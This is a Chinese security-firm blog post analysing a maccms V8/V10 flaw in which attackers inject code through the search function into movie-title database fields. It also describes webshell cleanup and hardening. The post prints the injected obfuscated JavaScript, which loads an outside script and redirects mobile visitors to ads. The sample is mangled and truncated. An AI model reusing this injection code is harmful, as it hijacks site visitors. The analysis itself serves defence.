苹果cms漏洞POC原理分析与V8 V10被挂马解决办法分享（漏洞验证是什么意思）

苹果CMS漏洞是越来越多了，国内很多电影网站都使用的是maccms V10 V8版本，就在2020年初该maccms漏洞爆发了，目前极少数的攻击者掌握了该EXP POC，受该BUG的影响，百分之80的电影站都被攻击了，很多电影站的站长找到我们SINE安全来解决网站被挂马的问题，通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码，尤其电影片名d_name值被直接篡改，并且是批量挂马，导致用户打开网站访问直接弹窗广告并跳转。

JS挂马代码如下：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>3

5?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c–)d[e

(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\\w+};c=1;};while(c–)

if(k[c])p=p.replace(new RegExp(\\b+e(c)+\\b,g),k[c]);return p;}(4.5(\<6 1=”3/2″

7=”//0.b.c.d/8.0″><\\/9\+\a>\);,14,14,js|type|javascript|text|document|write|script

|src|20569875|scr|ipt|users|51|la.split(|),0,{}));var abcdefg=navigator[“userAgent

“][“toLowerCase”]()[“match”](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon

e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout(

window.location.href=

上面恶意代码对访问用户进行了判断，如果是手机端的，IOS，安卓，以及平板都会跳转到攻击者设置好的广告网页当中去，根据我们SINE安全技术的分析与统计，大部分被攻击的网站跳转都是168端口的网址上，域名经常变换，但是168端口没有变，可以看出是同一个攻击者所为。

电影网站被挂马的特征就是以上这些情况，根据客户的反馈以及提供服务器IP，root账号密码后，我们进去对苹果cms的源代码进行了全面的人工安全审计，在网站的根目录下生成了webshell网站木马后门文件，在缓存目录中也发现了同样的网站木马，继续溯源追踪，查看nginx网站日志，发现用的是同样的手段，我们SINE安全技术再熟悉不过了，通过post index.php搜索功能进行插入数据库并嵌入挂马代码，漏洞产生的原因是电影搜索里可以插入恶意代码，攻击者将恶意代码加密后，不管你服务器用云锁，还是宝塔，安全狗，都是拦截不了的，还是会被篡改。

我们SINE安全技术随即对客户的苹果CMS漏洞进行了修复，对POST过来的数据进行了严格的安全过滤与检测，对攻击者加密的代码也进行了特征定位拦截。只要包含了该恶意内容，直接拦截并返回错误提示。对网站根目录下存在的webshell也进行了删除。对客户网站的缓存目录，以及图片目录，JS目录都做了安全部署与加固，防止php脚本文件在网站的运行，对网站的管理员后台进行了权限分离，更新采集，与网站前端访问使用2个数据库账号，1个只读权限的数据库账号，1个后台采集可写的数据库账号，这在安全层面上来说，网站安全等级更高了，一般攻击者无法攻击与篡改。我们即修复了漏洞，也做了安全拦截与多层次的安全加固部署，至此客户网站数据库被挂马的问题得以解决。

有很多客户的电影网站都到maccms官方进行了更新与补丁下载，但安装后还是会继续被挂马，这里跟大家说一下，目前官方的漏洞补丁对此次数据库挂马漏洞是没有任何效果的。如果不知道如何对苹果cms漏洞进行修复以及打补丁，建议找专业的网站安全公司来处理，对index.php搜索功能这里做安全过滤与拦截，对加密的特征码进行解密定位，更新到拦截黑名单中，即可修复该苹果CMS漏洞。